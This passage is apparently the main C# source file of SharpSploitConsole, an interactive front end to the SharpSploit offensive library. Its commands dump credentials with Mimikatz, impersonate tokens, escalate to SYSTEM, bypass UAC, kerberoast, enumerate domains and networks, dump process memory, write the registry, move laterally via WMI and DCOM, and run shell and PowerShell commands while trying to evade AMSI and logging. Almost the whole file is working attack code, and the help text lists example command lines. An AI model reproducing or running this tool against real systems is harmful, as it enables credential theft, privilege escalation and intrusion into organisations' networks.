request) 55 | { 56 | String error = ER(); 57 | try 58 | { 59 | //exit 60 | if (request[0].ToLower() == "exit") 61 | { 62 | return; 63 | } 64 | //help 65 | else if (request[0].ToLower() == "help" || request[0] == "?") 66 | { 67 | help(); 68 | } 69 | //SharpSploit Credential Modules 70 | else if (request[0].ToLower() == "mimi-all") 71 | { 72 | mimiAll(); 73 | } 74 | else if (request[0].ToLower() == "mimi-command") 75 | { 76 | mimiCommand(request); 77 | } 78 | else if (request[0].ToLower() == "logonpasswords") 79 | { 80 | logonPasswords(); 81 | } 82 | else if (request[0].ToLower() == "lsacache") 83 | { 84 | lsaCache(); 85 | } 86 | else if (request[0].ToLower() == "lsasecrets") 87 | { 88 | lsaSecrets(); 89 | } 90 | else if (request[0].ToLower() == "samdump") 91 | { 92 | samDump(); 93 | } 94 | else if (request[0].ToLower() == "wdigest") 95 | { 96 | wDigest(); 97 | } 98 | //Token Class Begin 99 | else if (request[0].ToLower() == "whoami") 100 | { 101 | WhoAmI(); 102 | } 103 | else if (request[0].ToLower() == "getsystem") 104 | { 105 | getSystem(); 106 | } 107 | else if (request[0].ToLower() == "impersonate") 108 | { 109 | impersonateProcess(request); 110 | } 111 | else if (request[0].ToLower() == "bypassuac") 112 | { 113 | bypassUAC(request); 114 | } 115 | else if (request[0].ToLower() == "reverttoself") 116 | { 117 | revertToSelf(); 118 | } 119 | //SharpSploit Enumeration Modules 120 | else if (request[0].ToLower() == "kerberoast") 121 | { 122 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 123 | 124 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 125 | if (Array.IndexOf(argsLower, "-target") > -1) 126 | { 127 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 128 | kerberoast(searcher, target); 129 | } 130 | else 131 | { 132 | kerberoast(searcher); 133 | } 134 | } 135 | else if (request[0].ToLower() == "getdomainusers") 136 | { 137 | 
SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 138 | 139 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 140 | if (Array.IndexOf(argsLower, "-target") > -1) 141 | { 142 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 143 | getDomainUsers(searcher, target); 144 | } 145 | else 146 | { 147 | getDomainUsers(searcher); 148 | } 149 | } 150 | else if (request[0].ToLower() == "getdomaingroups") 151 | { 152 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 153 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 154 | if (Array.IndexOf(argsLower, "-target") > -1) 155 | { 156 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 157 | getDomainGroups(searcher, target); 158 | } 159 | else 160 | { 161 | getDomainGroups(searcher); 162 | } 163 | } 164 | else if (request[0].ToLower() == "getdomaincomputers") 165 | { 166 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 167 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 168 | if (Array.IndexOf(argsLower, "-target") > -1) 169 | { 170 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 171 | getDomainComputers(searcher, target); 172 | } 173 | else 174 | { 175 | getDomainComputers(searcher); 176 | } 177 | } 178 | else if (request[0].ToLower() == "currentdirectory") 179 | { 180 | currentDirectory(); 181 | } 182 | else if (request[0].ToLower() == "directorylisting") 183 | { 184 | directoryListing(); 185 | } 186 | else if (request[0].ToLower() == "changedirectory") 187 | { 188 | changeDirectory(request); 189 | } 190 | else if (request[0].ToLower() == "hostname") 191 | { 192 | hostname(); 193 | } 194 | else if (request[0].ToLower() == "processlist") 195 | { 196 | processList(); 197 | } 198 | else if (request[0].ToLower() == "procdump") 199 | { 200 
| procDump(request); 201 | } 202 | else if (request[0].ToLower() == "username") 203 | { 204 | username(); 205 | } 206 | else if (request[0].ToLower() == "readregistry") 207 | { 208 | readReg(request); 209 | } 210 | else if (request[0].ToLower() == "writeregistry") 211 | { 212 | writeReg(request); 213 | } 214 | else if (request[0].ToLower() == "netlocalgroupmembers") 215 | { 216 | netLocalGroupMembers(request); 217 | } 218 | else if (request[0].ToLower() == "netlocalgroups") 219 | { 220 | netLocalGroups(request); 221 | } 222 | else if (request[0].ToLower() == "netloggedonusers") 223 | { 224 | netLoggedOnUsers(request); 225 | } 226 | else if (request[0].ToLower() == "netsessions") 227 | { 228 | netSessions(request); 229 | } 230 | else if (request[0].ToLower() == "ping") 231 | { 232 | ping(request); 233 | } 234 | else if (request[0].ToLower() == "portscan") 235 | { 236 | portScan(request); 237 | } 238 | //SharpSploit Lateral Movement Modules 239 | else if (request[0].ToLower() == "wmi") 240 | { 241 | wmi(request); 242 | } 243 | else if (request[0].ToLower() == "dcom") 244 | { 245 | dcom(request); 246 | } 247 | //SharpSploit Execution Modules 248 | else if (request[0].ToLower() == "shell") 249 | { 250 | shell(request); 251 | } 252 | else if (request[0].ToLower() == "powershell") 253 | { 254 | powerShell(request); 255 | } 256 | //Unknown command 257 | else 258 | { 259 | Console.WriteLine("unknown command, type help for commandline options"); 260 | } 261 | }//End Try 262 | catch 263 | { 264 | Console.WriteLine(error); 265 | } 266 | } 267 | //Methods 268 | private static void mimiAll() 269 | { 270 | var a = SharpSploit.Credentials.Mimikatz.All(); 271 | Console.WriteLine(a); 272 | } 273 | private static void mimiCommand(String[] request) 274 | { 275 | List clist = new List(); 276 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 277 | String command = "\"" + String.Join(" ", clist) + "\""; 278 | Console.WriteLine(command); 279 | var a = 
SharpSploit.Credentials.Mimikatz.Command(command); 280 | Console.WriteLine(a); 281 | } 282 | private static void logonPasswords() 283 | { 284 | var a = SharpSploit.Credentials.Mimikatz.LogonPasswords(); 285 | Console.WriteLine(a); 286 | } 287 | private static void lsaCache() 288 | { 289 | var a = SharpSploit.Credentials.Mimikatz.LsaCache(); 290 | Console.WriteLine(a); 291 | } 292 | private static void lsaSecrets() 293 | { 294 | var a = SharpSploit.Credentials.Mimikatz.LsaSecrets(); 295 | Console.WriteLine(a); 296 | } 297 | private static void samDump() 298 | { 299 | var a = SharpSploit.Credentials.Mimikatz.SamDump(); 300 | Console.WriteLine(a); 301 | } 302 | private static void wDigest() 303 | { 304 | var a = SharpSploit.Credentials.Mimikatz.Wdigest(); 305 | Console.WriteLine(a); 306 | } 307 | private static void WhoAmI() 308 | { 309 | SharpSploit.Credentials.Tokens whoami = new SharpSploit.Credentials.Tokens(); 310 | var a = whoami.WhoAmI(); 311 | Console.WriteLine(a); 312 | } 313 | private static void getSystem() 314 | { 315 | String error = ER(); 316 | SharpSploit.Credentials.Tokens getSys = new SharpSploit.Credentials.Tokens(); 317 | var a = getSys.GetSystem(); 318 | Console.WriteLine(a); 319 | } 320 | private static void impersonateProcess(String[] request) 321 | { 322 | String error = ER(); 323 | uint procID = UInt32.Parse(request[1]); 324 | SharpSploit.Credentials.Tokens impersonate = new SharpSploit.Credentials.Tokens(); 325 | var a = impersonate.ImpersonateProcess(procID); 326 | Console.WriteLine(a); 327 | } 328 | private static void bypassUAC(String[] request) 329 | { 330 | SharpSploit.Credentials.Tokens uac = new SharpSploit.Credentials.Tokens(); 331 | int pid = 0; 332 | uac.BypassUAC(request[1], request[2], request[3], pid); 333 | } 334 | private static void revertToSelf() 335 | { 336 | SharpSploit.Credentials.Tokens revert = new SharpSploit.Credentials.Tokens(); 337 | var a = revert.RevertToSelf(); 338 | Console.WriteLine(a); 339 | } 340 | private 
static void kerberoast(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 341 | { 342 | List a = searcher.Kerberoast(target); 343 | foreach (SharpSploit.Enumeration.Domain.SPNTicket val in a) 344 | { 345 | Console.WriteLine(val.GetFormattedHash()); 346 | } 347 | } 348 | private static void getDomainUsers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 349 | { 350 | List a = searcher.GetDomainUsers(target); 351 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 352 | { 353 | Console.WriteLine(val.ToString()); 354 | } 355 | } 356 | private static void getDomainGroups(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 357 | { 358 | List a = searcher.GetDomainGroups(target); 359 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 360 | { 361 | Console.WriteLine(val.ToString()); 362 | } 363 | } 364 | private static void getDomainComputers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 365 | { 366 | List a = searcher.GetDomainComputers(target); 367 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 368 | { 369 | Console.WriteLine(val.ToString()); 370 | } 371 | } 372 | private static void currentDirectory() 373 | { 374 | var a = SharpSploit.Enumeration.Host.GetCurrentDirectory(); 375 | Console.WriteLine(a); 376 | } 377 | private static void directoryListing() 378 | { 379 | var a = SharpSploit.Enumeration.Host.GetDirectoryListing(); 380 | Console.WriteLine(a); 381 | } 382 | private static void changeDirectory(String[] request) 383 | { 384 | SharpSploit.Enumeration.Host.ChangeCurrentDirectory(request[1]); 385 | } 386 | private static void hostname() 387 | { 388 | var a = SharpSploit.Enumeration.Host.GetHostname(); 389 | Console.WriteLine(a); 390 | } 391 | private static void processList() 392 | { 393 | var a = SharpSploit.Enumeration.Host.GetProcessList(); 394 | Console.WriteLine(a); 395 | } 396 | 
private static void procDump(String[] request) 397 | { 398 | int pid = Int32.Parse(request[1]); 399 | SharpSploit.Enumeration.Host.CreateProcessDump(pid, request[2], request[3]); 400 | } 401 | private static void username() 402 | { 403 | var a = SharpSploit.Enumeration.Host.GetUsername(); 404 | Console.WriteLine(a); 405 | } 406 | private static void readReg(String[] request) 407 | { 408 | var a = SharpSploit.Enumeration.Host.RegistryRead(request[1]); 409 | Console.WriteLine(a); 410 | } 411 | private static void writeReg(String[] request) 412 | { 413 | var a = SharpSploit.Enumeration.Host.RegistryWrite(request[1], request[2]); 414 | Console.WriteLine(a); 415 | } 416 | private static void netLocalGroupMembers(String[] request) 417 | { 418 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[3], request[4]); 419 | var a = SharpSploit.Enumeration.Net.GetNetLocalGroupMembers(request[1], request[2], Creds); 420 | foreach (var i in a) 421 | { 422 | Console.WriteLine(i); 423 | } 424 | } 425 | private static void netLocalGroups(String[] request) 426 | { 427 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 428 | var a = SharpSploit.Enumeration.Net.GetNetLocalGroups(request[1], Creds); 429 | foreach (var i in a) 430 | { 431 | Console.WriteLine(i); 432 | } 433 | } 434 | private static void netLoggedOnUsers(String[] request) 435 | { 436 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 437 | var a = SharpSploit.Enumeration.Net.GetNetLoggedOnUsers(request[1], Creds); 438 | foreach (var i in a) 439 | { 440 | Console.WriteLine(i); 441 | } 442 | } 443 | private static void netSessions(String[] request) 444 | { 445 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 446 | var a = SharpSploit.Enumeration.Net.GetNetSessions(request[1], Creds); 447 | foreach (var i in a) 448 | { 449 | Console.WriteLine(i); 450 | } 451 | } 452 | private static void ping(String[] 
request) 453 | { 454 | int Time = 250; 455 | int Thread = 100; 456 | List clist = new List(); 457 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 458 | var a = SharpSploit.Enumeration.Network.Ping(clist, Time, Thread); 459 | Console.WriteLine(a); 460 | } 461 | private static void portScan(String[] request) 462 | { 463 | int Time = 250; 464 | int Thread = 100; 465 | bool Ping = true; 466 | List plist = new List(); 467 | List plist1 = new List(); 468 | plist = String.Join(" ", request).Split(' ').Skip(2).ToList(); 469 | plist1 = plist.Select(int.Parse).ToList(); 470 | var a = SharpSploit.Enumeration.Network.PortScan(request[1], plist1, Ping, Time, Thread); 471 | Console.WriteLine(a); 472 | } 473 | private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args) 474 | { 475 | try 476 | { 477 | SharpSploit.Enumeration.Domain.Credential creds = null; 478 | string domain = "", server = "", searchBase = "", searchString = ""; 479 | System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree; 480 | int resultPageSize = 200; 481 | TimeSpan serverTimeLimit = default(TimeSpan); 482 | bool tombStone = false; 483 | System.DirectoryServices.SecurityMasks securityMasks = 0; 484 | 485 | string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray(); 486 | 487 | if (Array.IndexOf(argsLower, "-username") > -1) 488 | { 489 | if (Array.IndexOf(argsLower, "-password") > -1) 490 | { 491 | creds = new SharpSploit.Enumeration.Domain.Credential(args[Array.IndexOf(args, "-username") + 1], args[Array.IndexOf(args, "-password") + 1]); 492 | Console.WriteLine(args[Array.IndexOf(args, "-password") + 1]); 493 | } 494 | else 495 | { 496 | Console.WriteLine("Error, if providing credentials you must provide both a username and password"); 497 | return null; 498 | } 499 | } 500 | if (Array.IndexOf(argsLower, "-domain") > -1) 501 | { 502 | domain = args[Array.IndexOf(args, "-domain") + 1]; 503 | } 504 | if 
(Array.IndexOf(argsLower, "-server") > -1) 505 | { 506 | server = args[Array.IndexOf(args, "-server") + 1]; 507 | } 508 | if (Array.IndexOf(argsLower, "-searchbase") > -1) 509 | { 510 | searchBase = args[Array.IndexOf(args, "-searchbase") + 1]; 511 | } 512 | if (Array.IndexOf(argsLower, "-searchstring") > -1) 513 | { 514 | searchString = args[Array.IndexOf(args, "-searchstring") + 1]; 515 | } 516 | 517 | var gather = new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks); 518 | return gather; 519 | } 520 | catch 521 | { 522 | Console.WriteLine("Error Generating Domain Searcher Object"); 523 | return null; 524 | } 525 | } 526 | private static void wmi(String[] request) 527 | { 528 | List clist = new List(); 529 | clist = String.Join(" ", request).Split(' ').Skip(4).ToList(); 530 | string cmd = string.Join(" ", clist); ; 531 | var a = SharpSploit.LateralMovement.WMI.WMIExecute(request[1], cmd, request[2], request[3]); 532 | Console.WriteLine(a); 533 | } 534 | private static void dcom(String[] request) 535 | { 536 | List plist = new List(); 537 | plist = String.Join(" ", request).Split(' ').Skip(3).ToList(); 538 | string param = string.Join(" ", plist); 539 | var a = SharpSploit.LateralMovement.DCOM.DCOMExecute(request[1], request[2], param); 540 | Console.WriteLine(a); 541 | } 542 | private static void shell(String[] request) 543 | { 544 | List clist = new List(); 545 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 546 | String cmd = String.Join(" ", clist); 547 | Console.WriteLine(cmd); 548 | var a = SharpSploit.Execution.Shell.ShellExecute(cmd); 549 | Console.WriteLine(a); 550 | } 551 | private static void powerShell(String[] request) 552 | { 553 | List clist = new List(); 554 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 555 | String cmd = String.Join(" ", clist); 556 | Console.WriteLine(cmd); 557 | var a = 
SharpSploit.Execution.Shell.PowerShellExecute(cmd); 558 | Console.WriteLine(a); 559 | } 560 | //Interactive Console 561 | private static void console() 562 | { 563 | while (true) 564 | { 565 | Console.Write("SharpSploitConsole:> "); 566 | String cmd = RL(); 567 | String error = ER(); 568 | Char delimiter = ' '; 569 | String[] request = cmd.Split(delimiter); 570 | commands(request); 571 | } 572 | } 573 | //Error message 574 | private static string ER() 575 | { 576 | string a = "Something went wrong! Check parameters or try running as an admin or system user"; 577 | return a; 578 | } 579 | //Increases Readline from 256 chars to 8192 580 | const int READLINE_BUFFER_SIZE = 8192; 581 | private static string RL() 582 | { 583 | Stream inputStream = Console.OpenStandardInput(READLINE_BUFFER_SIZE); 584 | Console.SetIn(new StreamReader(inputStream, Encoding.Default, false, 8192)); 585 | return Console.ReadLine(); 586 | } 587 | //Help Menu 588 | private static void help() 589 | { 590 | Console.WriteLine(); 591 | Console.WriteLine("Enter Console Mode"); 592 | Console.WriteLine("------------------"); 593 | Console.WriteLine(); 594 | stringPrinter("Interact", "Starts interactive console mode, if you are interacting remotely you may not want to use this option"); 595 | Console.WriteLine(); 596 | Console.WriteLine("SharpSploit Credentials Commands"); 597 | Console.WriteLine("--------------------------------"); 598 | Console.WriteLine(); 599 | Console.WriteLine("Mimikatz"); 600 | Console.WriteLine("--------"); 601 | Console.WriteLine(); 602 | stringPrinter("Mimi-All", "Executes everything but DCSync - requires admin"); 603 | stringPrinter("Mimi-Command", "Executes a chosen Mimikatz command(s)."); 604 | stringPrinter("logonPasswords", "Runs privilege::debug sekurlsa::logonPasswords - requires admin"); 605 | stringPrinter("LsaCache", "Retrieve Domain Cached Credentials hashes from registry - requires admin"); 606 | stringPrinter("LsaSecrets", "Retrieve LSA secrets stored in registry 
- requires admin"); 607 | stringPrinter("SamDump", "Retrieve password hashes from the SAM database - requires admin"); 608 | stringPrinter("Wdigest", "Retrieve Wdigest credentials from registry"); 609 | Console.WriteLine(); 610 | Console.WriteLine("Tokens"); 611 | Console.WriteLine("------"); 612 | Console.WriteLine(); 613 | stringPrinter("Whoami", "Retrieve current user"); 614 | stringPrinter("GetSystem", "Impersonate system user, requires admin rights. Note: Can be ran in conjunction on the commandline with other commands to execute them with system level permissions. Example: sharpSploitConsole.exe getsystem logonPasswords"); 615 | stringPrinter("Impersonate", "Impersonate the token of a specified process, requires pid - command requires admin rights. Note: Can be ran in conjunction on the commandline with other commands to execute them with permissions of the impersonated user. Example: sharpSploitConsole.exe impersonate 1280 Kerberoast"); 616 | stringPrinter("BypassUAC", "Bypass UAC, requires binary, command | path to binary - requires admin rights"); 617 | stringPrinter("RevertToSelf", "Ends the impersonation of any token, reverts back to initial token associated with current process"); 618 | Console.WriteLine(); 619 | Console.WriteLine("SharpSploit Enumeration Commands"); 620 | Console.WriteLine("--------------------------------"); 621 | Console.WriteLine(); 622 | stringPrinter("CurrentDirectory", "Retrieve current working directory"); 623 | stringPrinter("DirectoryListing", "Retrieve current directory listing"); 624 | stringPrinter("ChangeDirectory", "Changes the current directory by appending a specified string to the current working directory"); 625 | stringPrinter("Hostname", "Retrieve hostname"); 626 | stringPrinter("ProcessList", "Retrieve list of running processes"); 627 | stringPrinter("ProcDump", "Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin"); 628 | stringPrinter("Username", 
"Retrieve current username"); 629 | stringPrinter("ReadRegistry", "Retrieve registry path value, requires full path argument"); 630 | stringPrinter("WriteRegistry", "Write to registry, requires full path | value"); 631 | stringPrinter("NetLocalGroupMembers", "Retrieve users of local group from a remote system, requires computername | groupname | username | password"); 632 | stringPrinter("NetLocalGroups", "Retrieve local groups from a remote system, requires computername | username | password"); 633 | stringPrinter("NetLoggedOnUsers", "Retrieve current logged on users from a remote system, requires computername| username | password"); 634 | stringPrinter("NetSessions", "Retrieve user sessions from a remote system, requires computername | username | password"); 635 | stringPrinter("Ping", "Ping systems, requires computernames"); 636 | stringPrinter("PortScan", "Port scan systems, requires computername | ports"); 637 | Console.WriteLine(); 638 | Console.WriteLine("SharpSploit Domain Enumeration Commands"); 639 | Console.WriteLine("--------------------------------"); 640 | Console.WriteLine("Note: optional args require the specified flag in addition to the value to set"); 641 | Console.WriteLine(); 642 | stringPrinter("GetDomainUsers", "Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainUsers"); 643 | stringPrinter("GetDomainGroups", "Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainGroups -target \"Domain Admins\""); 644 | stringPrinter("GetDomainComputers", "Grabs specified (or all) computer objects in the target domain, by default will use current user context. 
optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainComputers -target TestDC01"); 645 | stringPrinter("Kerberoast", "Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService"); 646 | 647 | Console.WriteLine(); 648 | Console.WriteLine("SharpSploit Lateral Movement Commands"); 649 | Console.WriteLine("--------------------------------"); 650 | Console.WriteLine(); 651 | stringPrinter("WMI", "Run command remotely via WMI, requires computername | username | password | command - requires admin"); 652 | stringPrinter("DCOM", "Run command remotely via DCOM, requires computername | command | directory | params - requires admin"); 653 | Console.WriteLine(); 654 | Console.WriteLine(); 655 | Console.WriteLine("SharpSploit Command Execution"); 656 | Console.WriteLine("--------------------------------"); 657 | Console.WriteLine(); 658 | stringPrinter("Shell", "Run a shell command. Example: shell net user"); 659 | stringPrinter("Powershell", "Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging. 
Example: sharpSploitConsole.exe powershell $PSVersionTable.PSVersion"); 660 | Console.WriteLine(); 661 | Console.WriteLine(); 662 | } 663 | private static void stringPrinter(string title, string description = "") 664 | { 665 | int firstIteration = 0; 666 | Console.Write("{0,-30}", title); 667 | if (description.Length == 0) 668 | { 669 | Console.WriteLine(); 670 | } 671 | while (description.Length > 0) 672 | { 673 | try 674 | { 675 | string choppedDesc = description.Substring(0, 85); 676 | int tempCut = choppedDesc.LastIndexOf(" "); 677 | if (firstIteration == 0) 678 | { 679 | Console.WriteLine("{0,-85}", description.Substring(0, tempCut)); 680 | firstIteration = 1; 681 | } 682 | else 683 | { 684 | Console.WriteLine("{0,-30} {1,-85}", "", description.Substring(0, tempCut)); 685 | } 686 | description = description.Remove(0, tempCut); 687 | } 688 | catch 689 | { 690 | if (firstIteration == 0) 691 | { 692 | Console.WriteLine("{0,-85}", description); 693 | } 694 | else 695 | { 696 | Console.WriteLine("{0,-30} {1,-85}", "", description); 697 | } 698 | break; 699 | } 700 | } 701 | } 702 | private static void art() 703 | { 704 | string asci = 705 | @" 706 | 707 | 708 | 709 | 710 | _________.__ _________ .__ .__ __ 711 | / _____/| |__ _____ _____________ / _____/_____ | | ____ |__|/ |_ 712 | \_____ \ | | \\__ \\_ __ \____ \\_____ \\____ \| | / _ \| \ __\ 713 | / \| Y \/ __ \| | \/ |_> > \ |_> > |_( <_> ) || | 714 | /_______ /|___| (____ /__| | __/_______ / __/|____/\____/|__||__| 715 | \/ \/ \/ |__| \/|__| "; 716 | 717 | string console = "@ [Console Edition v 1.1]@@" + 718 | " Written by anthemtotheego & g0ldengunsec@@" + 719 | "@" + 720 | " Type help or ? to show menu options@@@@"; 721 | 722 | console = console.Replace("@", System.Environment.NewLine); 723 | Console.WriteLine(asci); 724 | Console.WriteLine(console); 725 | } 726 | } 727 | } 728 | --------------------------------------------------------------------------------